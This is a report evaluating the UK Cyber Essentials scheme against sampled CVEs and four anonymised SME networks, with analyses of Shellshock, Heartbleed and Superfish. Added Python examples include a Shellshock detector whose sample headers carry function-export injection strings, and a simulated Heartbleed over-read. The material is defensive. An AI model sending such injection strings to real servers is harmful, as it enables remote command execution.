Cyber Essentials was introduced as a government-funded scheme, first published in April 2014, in the interest of national security to bolster UK security in cyberspace. The Cyber Essentials scheme was developed in collaboration with the Information Assurance for Small and Medium Enterprises (IASME) consortium, the Information Security Forum (ISF) and the British Standards Institution (BSI) as a set of basic technical security controls for organisations to utilise for the mitigation of the 'bottom 80%' of remote cyber-threats[3].
The scheme, built to provide an implementable version of the 10 Steps to Cyber Security[1], was released as part of the 2011 UK Cyber Security Strategy[16] and is being backed by the UK government as an organisational standard. Thus far it has been adopted by several large organisations including Vodafone, Hewlett-Packard (HP), BAE Systems, Virgin Media and Barclays[5].
The Cyber Essentials accreditation has been made mandatory from October 1st 2014 for all suppliers of government contracts involving "the handling of sensitive and personal information and provision of certain technical products and services"[17].
The Cyber Essentials security controls are summarised as follows[7]:
Firewalls and Gateways. These are devices designed to prevent unauthorised access to or from private networks, but good setup of these devices, either in hardware or software form, is important for them to be fully effective.

Secure configuration. Ensuring that systems are configured in the most secure way for the needs of the organisation.

Access control. Ensuring that only those who should have access to systems have access, and at the appropriate level.

Malware protection. Ensuring that virus and malware protection is installed and is up to date.

Patch management. Ensuring that the latest supported version of applications is used and all the necessary patches supplied by the vendor have been applied.
Figure 2 Cyber Essentials Security Tools
The intended scope of Cyber Essentials is outlined in the Cyber Essentials Scheme Assurance Framework[10]. This states that the CE controls are considered applicable to all sizes of enterprise as a base level of protection against cyber-attacks, upon which individual organisations may build with further tools, network devices or protocols for the mitigation of targeted attacks. The CE Scheme is clear in its inclusion of 'Bring Your Own Device' network setups in scope, as well as cloud-based services and off-the-shelf web applications. Bespoke IT systems, such as in manufacturing and retail, are applicable to CE but hold additional vulnerabilities due to their nature that are not to be considered.
Aims
The purpose of this report is to investigate the effectiveness of the Cyber Essentials controls in mitigating 'commodity-level' attacks attempting to exploit vulnerabilities in Small and Medium Enterprise (SME) networks.
A commodity-level attack has been defined by CESG[8] as:
Any unauthenticated remote attack exploiting a known vulnerability with the use of tools and techniques openly available for download or purchase on the internet - and that do not require extensive specialist knowledge to conduct.¹
To effectively assess Cyber Essentials it is firstly necessary to understand the typical network configurations of SMEs. Interviews with SMEs were carried out to build abstracted network models, and a survey has been conducted to build a broader picture of SME network deployments. The survey results will help to develop our understanding of current security practice and cyber-awareness, as well as to build a general-case SME network with which to analyse the typicality of the SMEs interviewed.
The networks modelled from collected data are to be considered with and without the use of the Cyber Essentials security controls, to comparatively establish the protection granted with the adoption of the CE scheme.
¹ This includes attacks utilising pen-testing software such as Metasploit, Kali and the Poison Ivy remote access tool, which are capable of scanning network nodes for publicly known vulnerabilities in the operating system, applications or services in use.
Methodology

The scheme of work for this report has been split into the following sections:
• Collection of data through interviews and a survey regarding the implementation and deployment of networks in real-world SMEs, for use in designing paper-models to be analysed.

• Composition of a list of suitable vulnerabilities that contains applicable methods by which remote attackers can carry out commodity-level attacks.

• Assessment of vulnerability mitigation for SME networks with and without the use of the CE Tools.
Data Collection
In order to analyse the effectiveness of the Cyber Essentials Security Tools, four real-world SME networks have been modelled. Models have been composed using information gathered in interviews and abstracted to reduce redundant complexity and remove any linkage with the SME. In addition, a generalisable SME model was composed from survey responses to serve as a baseline network from which all SME networks may be adapted.
Interviews
The interviews were composed with the goal of firstly understanding the layout or topology of the network deployed by an SME. To then build on the network configuration it was important to understand how the network is used - where remote connections take place, how local services are utilised, and how an attacker sees the network. Hardware vendors, operating systems and version numbers were considered to build a greater understanding of the network.
Additional questions were posed to examine the current state of security on the network, such as any security accreditations, previous breaches, and how often updates are rolled out.
Survey
The survey was constructed as a stripped-down questionnaire representing the essence of the questions posed in the interviews. This included details of the number of workstations at the SME to gauge its size, the local and remote services available, the operating systems used on the service providers and workstations, the current security policies in place, and the respondents' awareness of the CE Scheme.
Two surveys were sent out: one to a secure list of SMEs in the NW Security Cluster[9], and another publicly to closed groups of security-interested SME representatives.
Vulnerabilities
A total of 200 random vulnerabilities have been taken in equal numbers from two annual vulnerability lists, CVE-2013 and CVE-2014, published by Mitre². Any vulnerabilities found to be unsuitable for analysis have been replaced by a new candidate.
In this report we use the Mitre organisation's definition of a vulnerability, which they state as:
An information security "vulnerability" is a mistake in software that can be directly used by a hacker to gain access to a system or network. CVE considers a mistake a vulnerability if it allows an attacker to use it to violate a reasonable security policy for that system (this excludes entirely "open" security policies in which all users are trusted, or where there is no consideration of risk to the system).

(As shown on Mitre.org's Terminology page[6] in March '15)

² CVE is sponsored by US-CERT in the office of Cybersecurity and Communications at the US Department of Homeland Security.

Figure 3 Methodology for Assessing Cyber Essentials
To warrant a CVE entry in the Mitre list, individual vulnerabilities must place the affected system (or systems) into a state which either:

• allows an attacker to execute commands as another user;

• allows an attacker to access data that is contrary to the specified access restrictions for that data;

• allows an attacker to pose as another entity;

• allows an attacker to conduct a denial of service.
High-Profile Vulnerabilities
Three specific high-profile vulnerabilities were also taken in addition to the randomly chosen 200, and have been assessed as to what extent the Cyber Essentials scheme would affect the vulnerability of SMEs in these situations.
Additionally, the applicability of these vulnerabilities to the SME networks we studied is included, along with the respective potential to harm operations.
Mitigation Assessment
The vulnerabilities chosen have been qualitatively assessed for mitigation with and without the use of the Cyber Essentials controls. The process considers each component of the controls in asserting whether each vulnerability would be mitigated, partially mitigated or not mitigated. The results are double-vetted to ensure correctness.
For each of the SMEs interviewed, each of the vulnerabilities is assessed for applicability to that network configuration. In cases where the vulnerability is for a specific model of hardware, the network is deemed applicable if it uses a like-product from the same vendor. In cases where the vulnerability is in software, only those referencing software in use or likely in use (based on the SME's practice) are deemed applicable to the network.
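The applicability rules and the three-way mitigation verdict described above can be expressed as a small tally over a vulnerability list. The following is an added example written for this page, not the report's own tooling or data: the network inventory, the CVE-EXAMPLE identifiers and their verdicts are constructed, and the per-CVE judgement with the controls in place is taken as an input field, since the report makes that judgement by hand.

```python
"""Applicability and mitigation tally for a CVE list against an SME network.

Added example, not the report's tooling. It encodes the two applicability
rules from the methodology (hardware: a like-product from the same vendor;
software: a product in use or likely in use) and the three-way outcome
(mitigated / partially mitigated / not mitigated), then aggregates counts the
way the report's Figure 4 does. All identifiers and verdicts are constructed.
"""
from collections import Counter
from dataclasses import dataclass
from typing import FrozenSet, Iterable, Dict

MITIGATED = "mitigated"
PARTIAL = "partially mitigated"
NOT_MITIGATED = "not mitigated"


@dataclass(frozen=True)
class Vulnerability:
    cve: str          # constructed placeholder id, not a real CVE
    kind: str         # "hardware" or "software"
    vendor: str       # hardware vendor, or software publisher
    product: str      # specific model or package the entry names
    verdict: str      # assessor's judgement with the CE controls in place


@dataclass(frozen=True)
class Network:
    name: str
    hardware_vendors: FrozenSet[str]   # vendors of routers/switches/APs in use
    software_in_use: FrozenSet[str]    # products known or likely in use


def is_applicable(vuln: Vulnerability, net: Network) -> bool:
    """Apply the report's applicability rules to one vulnerability."""
    if vuln.kind == "hardware":
        # Like-product rule: any device from the same vendor counts.
        return vuln.vendor.lower() in {v.lower() for v in net.hardware_vendors}
    # Software rule: only products in use (or likely in use) count.
    return vuln.product.lower() in {p.lower() for p in net.software_in_use}


def assess(vulns: Iterable[Vulnerability], net: Network,
           ce_controls: bool = True) -> Dict[str, int]:
    """Count outcomes for the vulnerabilities applicable to `net`.

    Without the CE controls every applicable vulnerability is counted as not
    mitigated, matching the report's finding for that case.
    """
    counts = Counter({MITIGATED: 0, PARTIAL: 0, NOT_MITIGATED: 0})
    for v in vulns:
        if not is_applicable(v, net):
            continue
        counts[v.verdict if ce_controls else NOT_MITIGATED] += 1
    return dict(counts)


def percentages(counts: Dict[str, int]) -> Dict[str, float]:
    """Express an outcome tally as percentages of the applicable total."""
    total = sum(counts.values())
    return {k: round(100.0 * n / total, 1) if total else 0.0
            for k, n in counts.items()}


# Constructed sample data (placeholder ids; verdicts are illustrative only).
SAMPLE_VULNS = [
    Vulnerability("CVE-EXAMPLE-1", "hardware", "TP-Link", "TL-WR740N", NOT_MITIGATED),
    Vulnerability("CVE-EXAMPLE-2", "hardware", "Draytek", "Vigor", PARTIAL),
    Vulnerability("CVE-EXAMPLE-3", "software", "Microsoft", "Windows 7", MITIGATED),
    Vulnerability("CVE-EXAMPLE-4", "software", "Adobe", "Flash Player", PARTIAL),
    Vulnerability("CVE-EXAMPLE-5", "software", "Docker", "Docker", MITIGATED),
]

# An inventory in the style of the report's second SME: TP-Link and Dell
# equipment, Windows and OS X workstations, Flash assumed likely in use.
SAMPLE_NETWORK = Network(
    "SME-2 style",
    frozenset({"TP-Link", "Dell"}),
    frozenset({"Windows 7", "OS X", "Flash Player"}),
)

if __name__ == "__main__":
    with_ce = assess(SAMPLE_VULNS, SAMPLE_NETWORK)
    without_ce = assess(SAMPLE_VULNS, SAMPLE_NETWORK, ce_controls=False)
    print("with CE:", with_ce, percentages(with_ce))
    print("without CE:", without_ce, percentages(without_ce))
```

Applying percentages() to the report's own full-list counts (131, 61 and 8 of 200) reproduces the split shown in Figure 4; the per-network figures in the case studies follow from the same tally restricted to the applicable subset.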
Analysis

The analysis of the data collected has been split into sections. Firstly, each of the vulnerabilities has been assessed to ascertain its mitigation with and without the use of the Cyber Essentials controls; this supposes a case where any software or hardware source of a vulnerability is in use (i.e. a worst-case, fully inclusive assessment).
What follows is an analysis of the information gathered from interviews. Four SMEs from distinct industries are detailed in physical infrastructure and service usage, as well as current user access policies and existing security measures in place. A summary of the mitigation results for vulnerabilities in software and hardware used for each SME network configuration is included.
The full table for the applicability of all CVE vulnerabilities to each of the network structures can be found in the CVE Details section on page 19.
Finally, the data collected from the survey is analysed and used to develop a general-case network model; the SME networks are compared to this to better understand the nuances of each market sector, as well as the overall typical configuration of SMEs.
Full Vulnerabilities Assessment
Of the entire list of 200 vulnerabilities from 2013 and 2014 deemed applicable to the study and chosen for analysis, 131 vulnerabilities were mitigated with the use of the Cyber Essentials Security Tools, 61 vulnerabilities were partially mitigated, and 8 were not mitigated.
Figure 4 Percentage of Full Vulnerabilities List Mitigated
Partially Mitigated. 59 of the 61 CVEs judged as partially mitigated are as such because they rely on patches from third-party software or hardware vendors, but will be mitigated once a security fix has been released. Despite any level of security tools being deployed on a network, the security involved in using third-party software unfortunately relies on the vendor's ability to identify potential areas of risk, as well as to quickly respond to security breaches as they become apparent with the release of patches. All software installed on an SME network should be periodically reviewed to decide whether it is necessary - or if there are more suitable and potentially more secure solutions available.
The other two partially mitigated vulnerabilities rely on website blacklisting combined with avoiding vulnerable web browser software. A secure configuration without such a browser would mitigate these vulnerabilities, but, as in the Web Development SME case study, it may not always be possible to avoid the use of a specific piece of software. In a case such as this, website blacklisting is the only defence against the vulnerabilities.
Not Mitigated - Secure Configuration. Some vulnerabilities have been found to be unmitigatable using the CE controls; in each of the cases found this is due to inherent flaws in a hardware device or software that cannot be fixed by a security patch or firmware update.
For these devices that are fundamentally flawed from a cyber-security standpoint, it can be that no level of security tools on top of the network can aid in mitigation - rather, the hardware should be replaced to ensure network security. It may be possible for a public list of all such devices to be developed as part of the government cyber-security scheme, to serve as a device blacklist for SMEs.
Case Studies
Four SMEs were interviewed to build paper-models upon which the Cyber Essentials controls may be assessed. Some detail on the physical structure, usage and existing security of each network is provided.
• SME Network One represents a finance specialist SME using a combination of externally managed services for banking, in addition to internal, remotely accessible services for employees.

• SME Network Two represents a specialist SME utilising an off-site, remotely managed server for administrator services and cloud-based services for employees.

• SME Network Three represents a web services SME that accesses client servers frequently and utilises cloud-based services daily.

• SME Network Four represents a hospitality services provider with a very small company network co-located with a very large guest network component, where all of the services are remotely managed and located.
SME Network One - Finance Sector
Physical Infrastructure. The company interviewed comprised around 20 employees located at 3 sites nationally.

Remote workers connect over normal internet connections, both residential and commercial, and use both VPN and non-VPN traffic (specifically web traffic on port 80) to access services supplied by the company.
Figure 5 SME-1 Network
The hardware at the head office (where the interview was carried out) consists of equipment by 3Com, Draytek, BT and Huawei for infrastructure components. Employees use a range of machines bought between 2011 and 2014, comprising a mix of Dell and Lenovo PCs.

As most of the infrastructure is passive (most of the traffic is handled by a single 3Com BaseT-1000 switch), the firmware on the equipment is unchanged from purchase, if any firmware is present at all.

Services. At the head office site a Windows file server (SAMBA) provides local file sharing and allows remote users to access the same files via VPN. The mail server, a Microsoft Exchange Server, is an off-site deployment managed by an external company, but is a dedicated server for only this company.

Additionally, a web service and database server is run from a server at the site. This provides local HTTP access to the database it runs, and firewall rules have been put in place to allow external access to the same system for off-site employees.

Numerous other pieces of banking software are run on bank-owned remote servers and are accessed and secured via combinations of smart cards and PIN entry devices, also supplied by the banks.
User Access. Employees are permitted to access the internet from both their individual workstations and additional devices such as smart phones (although technically this is not permitted by policy, the policy is not strictly enforced). Internet access is, however, slightly filtered, with access to Facebook being blocked by the router.

Access logs for any network operations are not created, and any machine in the office can access the network, with no isolated islands.

User accounts can be migrated between machines via a Domain Controller, but in practice this is unlikely to actually happen, with users generally using their own machines.

Operating systems. Locally everything is Windows 7; the remote site uses Windows 7; 2 remote machines are Windows 8.1.

Mitigation of applicable vulnerabilities. Of the 200 listed vulnerabilities, 119 were applicable to the first SME network.
Figure 6 SME-1 Vulnerability Mitigation
Because much of this SME's operations are done via browser-based interfaces to other financial companies (such as banks), it places them in the firing line for a large number of the browser-based attacks. Furthermore, as some banks require specific browser versions for their interfaces to work, they end up with several different browsers, with several versions of each, to cover all their requirements, opening them up multiple times to browser-based vectors.

Additionally, the heavy use of SSL-based communication places them in a position where any SSL vulnerabilities affect them too.
SME Network Two - Specialist Group
Physical Infrastructure. The second SME participant employs 20-25 staff based across multiple offices in one building.

Employees may bring their own devices or use a workstation provided. Workstations are connected to one of four switches via Ethernet and share a virtual LAN with other employee devices. An off-site server containing sensitive data is accessible only to administrators via SSH.

Network equipment includes an external Dell PowerEdge server, four TP-Link switch access points and a TP-Link DHCP router.
Figure 7 SME-2 Network
Services. Employee devices sharing the network can use Windows Folder Sharing. Employee devices run OS X, Windows XP, Windows 7 and Windows 8, with auto-updates enabled.

Some employees use a VPN to connect to another network for a data service. All other services are provided by cloud servers via HTTPS: email, files and database, as well as management tools; these are used daily.

User Access. Employees have no restriction on their internet access and may use their own equipment. Administrators often access a remote server database and file store acting as a web server. Guests may access a separate Wi-Fi network through the same access points as other office workers, but do not share the same virtual LAN as employees. Wi-Fi access logs are gathered, but no other user activity is logged. Employees can access the network from any machine, but the SME's policy is that all machines should have anti-malware and strong passwords, which are recommended to be changed periodically, with the employee machines configured to automatically lock after a period of inactivity.

Mitigation of applicable vulnerabilities. Of the 200 listed vulnerabilities, 79 were applicable to the second SME network.
Figure 8 SME-2 Vulnerability Mitigation
The specialist SME had the fewest overall potential vulnerabilities, largely owing to a higher reliance on cloud-based services. Although this reduces the risk from inherent vulnerability in a network, responsibility is handed on to the service provider chosen. A certified and reputable cloud services provider should thus be sought to ensure protection through the entire chain.
SME Network Three - Web Development
Physical Infrastructure. SME-3 employs 10 workers based in one building.

Employees are restricted from using their own devices unless validated by the company head - in which case no others may share that device. Workstations are connected to one switch via Ethernet and share a virtual LAN with other employee devices.

Network equipment includes an external Dell PowerEdge server, one TP-Link switch access point and a TP-Link DHCP router.
Figure 9 SME-3 Network
Services. Employee devices sharing the network can use Windows Folder Sharing. Employee devices run OS X, Windows 7 and Windows 8, with auto-updates enabled.

All services are provided by cloud servers via HTTPS: email, files and database, as well as management tools; these are used daily.

User Access. Employees have no restriction on their internet access and commonly use all major browsers for compatibility testing.

Guests are not permitted on the network, but may join a 'guest' network through the same access points with a mobile device. Wi-Fi logs and cloud service access logs are gathered and actively monitored. Employees can access the network from a validated machine, but the SME's policy is that all machines should have anti-malware and strong passwords, which are recommended to be changed periodically, with the employee machines configured to automatically lock after a period of inactivity.
Mitigation of applicable vulnerabilities. Of the 200 listed vulnerabilities, 116 were applicable to the third SME network.
Figure 10 SME-3 Vulnerability Mitigation
The requirement for web development SMEs to operate across multiple web browsers, on various versions, to test and build a customer's website means that the network accumulates all vulnerabilities in web browsers. As this is a specialist case, a recommendation for web development organisations could be to use one up-to-date browser for general use. A bespoke policy may then be put in place.

When working on alternative browsers, employees should only access client pages where the developer has control of the web content.
SME Network Four - Hotel Services
Figure 11 SME-4 Network
Physical Infrastructure. This company is located at a single site and has equipment composed of a single desktop PC and 2 company laptops running on an ADSL router - this same router also provides the internet connection for the guests. An alternative router is available as a manual fall-back connection to the internet, but is available only to company equipment.

The guest network is split from the office network through secondary access point names, filtering traffic into a separate VLAN internal to the router.

Services. No local servers are present to provide any service to employees or guests on the network.

File storage is provided through online services including Dropbox and SkyDrive. A standalone web server, owned and managed externally, runs the company website, and bookings are managed via a globally accessible website.

All the services are accessed with SSL-secured connections (HTTPS mainly).

User Access. User access is not mediated in any way, and any site can be accessed from any computer. Guests have no restrictions placed on their network usage either.

Operating systems. The company uses iOS for their mobile devices and Windows 8.1 for the office desktop and laptop PCs. Guests can bring their own equipment, so there will be a mix of all operating systems currently available, including Windows, Linux, Mac and others.

Existing Security Measures. Beyond the router's separation between the guest and office networks, no other network security measures are in place. The office PCs do have automatic patch installation configured, however, and have the Kaspersky antivirus suite installed.
Mitigation of applicable vulnerabilities. Of the 200 listed vulnerabilities, 103 were applicable to the fourth SME network.
Figure 12 SME-4 Vulnerability Mitigation
Similarly to SME 1, SME 4 requires the use of web browsers for bookings and the reception of guests, and so enables a wide variety of attack vectors through the web.

Thankfully, the services and servers they connect to are run by larger corporations, which will hopefully have implemented at least Cyber Essentials-grade security and protection, so the actual risks should be minimal.

For the purposes of this report, however, we assume that if this company has not implemented Cyber Essentials then the services they use must also not have, leaving them open to attack.
Survey Responses
Data gathered from survey responses affords a much broader look at the typical network deployments and practice in SMEs. The full results from 17 participants may be found in the Survey Responses section on page 27.

Physical Infrastructure. The majority of respondents belong to SMEs with 0-9 workstations on site; this is related to the size of an organisation, and could be considered representative of businesses across the UK.

Services. Local - file, email, database and domain servers are the most common local service providers, all present in more than a third of SMEs. Remote - email, web hosting and file sharing are the most common services provided remotely.

User Access. More than half of SMEs permit employees' own devices to be used in the workplace; for organisations such as these it is important to ensure that employee machines receive the same level of protection as the rest of the work network - as one vulnerable machine allows vulnerability into the whole company.

Existing Security Measures. Of the survey respondents, most SMEs have a firewall, password policy and data-loss prevention scheme in place. These are the most common security measures in place for the SMEs contacted; below these are access control, malware protection and finally patch management, which is present in a little over half of organisations.

Almost two-thirds of survey participants were previously aware of Cyber Essentials.
Survey Respondents Network
The network built from survey respondents' data considers the overall response in order to build a network easily adaptable to match the majority of SME network configurations.

Locally, email and file servers have been represented, with domain controller capabilities represented in a network ADSL router. Remotely, a web server is depicted, but remote services may also include database usage, email and other web services.
Figure 13 Adaptable Survey-Response Network
Typicality of Case-Study SMEs
Within the survey respondents' network, aspects of each of the interviewed SME networks are apparent.

The Finance SME network shares a local file server, as sensitive information needs to be kept and processed by the organisation. Any SME handling sensitive information will be likely to strongly consider using local file servers.

The Specialist SME shares with the survey respondents' data its use of SSH to connect remotely to services. SSH is an important tool for accessing sensitive data while at home, or data that is stored remotely from the workplace.

The Web Development SME requires employees to connect to many web servers remotely; the survey respondents match this case with the use of external web-hosting services. That being said, in the general case this server is more likely to be the SME's own web-hosting solution rather than a client's.

The Hotel Services SME represents a very basic local network, using only cloud-based services remotely. This is becoming an increasingly popular trend for SMEs, as cloud services are often easier to set up and cheaper to maintain. This is also representative of many SMEs with little-to-no online presence.
Analysis of Cyber Essentials on High Profile Vulnerabilities

The following sections detail three of the high-profile vulnerabilities to hit the popular media in late 2014 to early 2015. These are of particular note as, while they may not be the most damaging of attack vectors (although some are very serious), they have caught the attention of the public, and SMEs would be under pressure to ensure that they were protected.

With this in mind, we analyse how effective the Cyber Essentials security controls are at tackling these high-profile vulnerabilities.
"ShellShock"
Also known by the name "BashDoor", Shellshock hit the news as it attacked the Linux server environment, and did so in a particularly effective manner.
GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution, aka "ShellShock." NOTE: the original fix for this issue was incorrect; CVE-2014-7169 has been assigned to cover the vulnerability that is still present after the incorrect fix.
(CVE-2014-6271 [13])
The exploit allowed attackers to directly execute arbitrary shell commands on a compromised system by altering environment variables. However, the bug was not enough by itself to compromise a system; it was reached through other services that set environment variables from untrusted input. While the exploit is only effective if the bash environment can be altered, the results can be devastating, as it lays bare the entire system to many other forms of attack.
The threat was particularly insidious for SMEs who used Linux/Unix based servers for services (mail servers, for example), as they would potentially have no idea that they had been compromised.
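The privilege boundary the CVE text describes is easiest to see in the CGI case: a gateway copies client-supplied request headers into the environment of a server-side process. The following added example (not code from the report or from any of the projects it names) builds that environment the way a CGI gateway does and flags any value shaped like a bash function export, which is what a patched bash refuses to import and what a web server's environment should never contain. The header names and sample requests are constructed for the example.

```python
import re
from typing import Dict, List

# The bash "exported function" prefix: optional whitespace, "()", optional
# whitespace, "{". Pre-patch bash treated any environment value beginning
# this way as a function definition and kept parsing past the closing brace,
# which is the flaw CVE-2014-6271 describes.
FUNCTION_EXPORT = re.compile(r"^\s*\(\)\s*\{")


def cgi_environment(headers: Dict[str, str]) -> Dict[str, str]:
    """Map HTTP request headers to CGI meta-variables as a CGI gateway does
    (RFC 3875): 'User-Agent' becomes HTTP_USER_AGENT, and so on. This is the
    privilege boundary: client text lands in a server process's environment."""
    env: Dict[str, str] = {}
    for name, value in headers.items():
        key = "HTTP_" + name.upper().replace("-", "_")
        env[key] = value
    return env


def flag_function_exports(env: Dict[str, str]) -> List[str]:
    """Return the names of environment variables whose value looks like a
    bash function export. A request-derived environment should have none."""
    return sorted(k for k, v in env.items() if FUNCTION_EXPORT.match(v))


# Constructed sample requests (not taken from the report).
BENIGN_REQUEST = {
    "Host": "www.example.test",
    "User-Agent": "Mozilla/5.0 (X11; Linux x86_64)",
    "Accept": "text/html",
}
SUSPICIOUS_REQUEST = {
    "Host": "www.example.test",
    "User-Agent": "() { :; }; echo probe",
    "Cookie": "() { ignored; }; echo probe",
    "Accept": "text/html",
}

if __name__ == "__main__":
    for label, req in (("benign", BENIGN_REQUEST), ("suspicious", SUSPICIOUS_REQUEST)):
        hits = flag_function_exports(cgi_environment(req))
        print(f"{label}: {hits or 'no function exports'}")
```

The check is a detection aid for request logs or a reverse proxy, not a substitute for the bash patch: the real fix is the patch-management control the report assesses, since a patched bash ignores these values entirely.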
"Heartbleed"
Appearing in April 2014, the CVE-2014-0160 (aka "Heartbleed") bug allowed attackers to directly read the active memory of a target machine through a buffer over-read. This then allowed attackers to access private credentials (or indeed anything else) in the RAM of the target.
As described in the original CVE report:
The (1) TLS and (2) DTLS implementations in OpenSSL 1.0.1 before 1.0.1g do not properly handle Heartbeat Extension packets, which allows remote attackers to obtain sensitive information from process memory via crafted packets that trigger a buffer over-read, as demonstrated by reading private keys, related to d1_both.c and t1_lib.c, aka the Heartbleed bug.
(CVE-2014-0160 [12])
As OpenSSL is a core part of many applications and services, both in the open and closed source world, this vulnerability had the potential to damage a huge number of systems. At the time of release, various sources (including, for example, Netcraft [15]) reported that up to 17% of trusted SSL-certified servers were vulnerable to the attack.
Depending on how the SME in question operates, the threat this particular CVE posed (and indeed still poses, with as-yet-unpatched servers still online) is difficult to discern. Obviously the vulnerability is serious, but the ability of individual SMEs to detect and correct this flaw will vary greatly depending on the individual deployments.
Larger companies with their own Linux/Unix servers may have been able to deploy the patched OpenSSL version as soon as the patch was available, but smaller businesses, or those with more cloud-based services, may not have access to the software running on the servers they use and may be at the mercy of the respective operators to implement the fix. Because of this, patch management only partially remedies this vulnerability, and other protection methods from the Cyber Essentials guidelines, such as securing configurations or controlling access, will have unknown effects.
It is vulnerabilities such as this that pose the greatest threat to SME networks, as the methods to fix the issue are often outside the control of the company, potentially leaving them vulnerable far longer than one would expect.
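The "buffer over-read" above comes down to one missing comparison: the heartbeat responder copied as many bytes as the peer's length field claimed, without checking that the record actually contained them. The following added example (not OpenSSL's code, and not from the report) models that in Python with a toy heartbeat message and a constructed stand-in for the memory beyond the record, showing the unchecked responder beside the one that applies the 1.0.1g check. The message layout follows the heartbeat format (type, 16-bit length, payload, padding); the memory contents and helper names are constructed.

```python
import struct
from typing import Optional

HEARTBEAT_REQUEST = 1
HEARTBEAT_RESPONSE = 2
PADDING_LEN = 16  # heartbeat messages carry at least 16 bytes of padding

# Constructed stand-in for whatever the process happened to hold right after
# the received record. Not a real key; filler text for the demonstration.
OTHER_PROCESS_DATA = b"-----BEGIN PRIVATE KEY----- (constructed filler) -----END PRIVATE KEY-----"


def build_heartbeat(payload: bytes, claimed_length: Optional[int] = None) -> bytes:
    """Encode a heartbeat request: type (1 byte), payload_length (2 bytes,
    big-endian), payload, padding. claimed_length lets a test send a length
    field that disagrees with the payload actually present."""
    length = len(payload) if claimed_length is None else claimed_length
    return struct.pack("!BH", HEARTBEAT_REQUEST, length) + payload + b"\x00" * PADDING_LEN


def respond_unchecked(record: bytes, memory_after_record: bytes) -> bytes:
    """Pre-1.0.1g behaviour: copy as many bytes as the length field claims,
    starting at the payload, without checking the record is that long. Bytes
    beyond the record come from adjacent memory (simulated here)."""
    _, claimed = struct.unpack("!BH", record[:3])
    memory = record + memory_after_record       # simulated heap layout
    payload = memory[3:3 + claimed]             # over-reads when claimed > actual
    return struct.pack("!BH", HEARTBEAT_RESPONSE, claimed) + payload + b"\x00" * PADDING_LEN


def respond_checked(record: bytes, memory_after_record: bytes) -> Optional[bytes]:
    """Fixed behaviour: the claimed payload must fit inside the record along
    with the type, length and minimum padding; otherwise the message is
    silently discarded (the patch returns without answering)."""
    if len(record) < 1 + 2 + PADDING_LEN:
        return None
    _, claimed = struct.unpack("!BH", record[:3])
    if 1 + 2 + claimed + PADDING_LEN > len(record):
        return None
    payload = record[3:3 + claimed]
    return struct.pack("!BH", HEARTBEAT_RESPONSE, claimed) + payload + b"\x00" * PADDING_LEN


def leaked_bytes(response: bytes, sent_payload: bytes) -> bytes:
    """Whatever the responder echoed beyond the payload that was actually sent."""
    _, length = struct.unpack("!BH", response[:3])
    echoed = response[3:3 + length]
    return echoed[len(sent_payload):]


if __name__ == "__main__":
    honest = build_heartbeat(b"ping")
    oversized = build_heartbeat(b"ping", claimed_length=64)
    print("honest, unchecked leak:", leaked_bytes(respond_unchecked(honest, OTHER_PROCESS_DATA), b"ping"))
    print("oversized, unchecked leak:", leaked_bytes(respond_unchecked(oversized, OTHER_PROCESS_DATA), b"ping"))
    print("oversized, checked response:", respond_checked(oversized, OTHER_PROCESS_DATA))
```

Note that the checked responder drops the message rather than answering with an error; that matches the upstream fix and is the reason a patched server leaks nothing, while the report's point stands that an SME relying on a hosted service cannot apply this check itself.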
"Superfish"
The SDK for Komodia Redirector with SSL Digestor, as used in Lavasoft Ad-Aware Web Companion 1.1.885.1766 and Ad-Aware AdBlocker (alpha) 1.3.69.1, Qustodio for Windows, Atom Security, Inc. StaffCop 5.8, and other products, uses the same X.509 certificate private key for a root CA certificate across different customers' installations, which makes it easier for man-in-the-middle attackers to spoof SSL servers by leveraging knowledge of this key, as originally reported for Superfish VisualDiscovery on certain Lenovo Notebook laptop products.
(CVE-2015-2077 [14])
This vulnerability is particularly interesting, as the software causing the issue was effectively brokered by a trusted hardware vendor, namely Lenovo. Because the issue was part of the 'normal configuration' for the equipment, it remained undetected for a long time, and hints that there may be further breaches in security as yet undiscovered in both Lenovo's and other manufacturers' equipment.
The vector is the Superfish software essentially breaking the chain of trust for SSL certificates by installing a self-signing certificate into the list of trusted certificates on the host machine. This allows an attacker to simply sign their own code via the same
certificate (which itself can be easily gathered from any other machine running Superfish), and they then have full access to any SSL-secured connection from the target machine.
Thankfully, while the risk to users and SMEs was high, the fix is a simple one-time run of a removal tool provided by Lenovo themselves [11], and is mitigated fully through the Cyber Essentials patch management advice.
Threat Analysis
ShellShock: Without Cyber Essentials in place, SMEs 1 and 2 would be at risk from 'Shellshock', as they both operate Unix/Linux based systems that would require patching to plug the security issue. The extent to which SMEs 3 and 4 are vulnerable to this issue is unclear, as their large dependency on outside service providers leaves them in a position where they are both unable to determine their vulnerability and unable to remedy it.
With Cyber Essentials, SMEs 1 and 2 would be fully protected, and it is likely that SMEs 3 and 4 are also protected if the external providers also use Cyber Essentials or other security and patching schemes.
Heartbleed: The 'Heartbleed' bug is another vulnerability that, without the Cyber Essentials guidelines being followed, would have laid companies' external-facing services open to malicious attackers.
In all cases, however, each SME can be fully protected with a combination of patch management, firewalling and application of access controls from the Cyber Essentials guidelines.
Superfish: All of the SMEs we interviewed could be exceedingly vulnerable to the 'Superfish' issue without Cyber Essentials, as much of their operations revolve around SSL-encrypted communications. A break in the chain of trust for their certificates would allow an attacker to man-in-the-middle their communications.
Normal system updates would have failed to remedy the situation, as the fix provided by Lenovo consisted of a tool to be run in addition to the normal operating system patches. It is further debatable how effective Cyber Essentials patch management would have been in plugging this vulnerability, as it would require that the administrators be aware of the issue and know of the patch, rather than simply following 'normal' patching guidelines. Assuming that the persons responsible for the equipment are aware of the issue, however, then Cyber Essentials patch management fully mitigates this issue.
Conclusions
The Cyber Essentials Security Tools have been shown to mitigate, or to mitigate as soon as a patch is released, all vulnerabilities from remote attackers that do not exploit fundamentally insecure software or hardware. Of the two-hundred vulnerabilities collected, eight exploits were not able to be resolved with the deployment of security patches; for vulnerabilities such as these, the only mitigation available is simply not to install the compromised systems. To help prevent deployments being susceptible to attacks on faulty systems, it may be recommended that a blacklist of such items is composed for public reference.
Scope: It is important to consider that the scope of this study covers only internet-based, commodity-level attacks, and although the Cyber Essentials tools perform very well in mitigating these, this does not represent full security. There is an increasingly identified risk from insiders that also requires attention, not least malicious acts, but also users unknowingly compromising security.
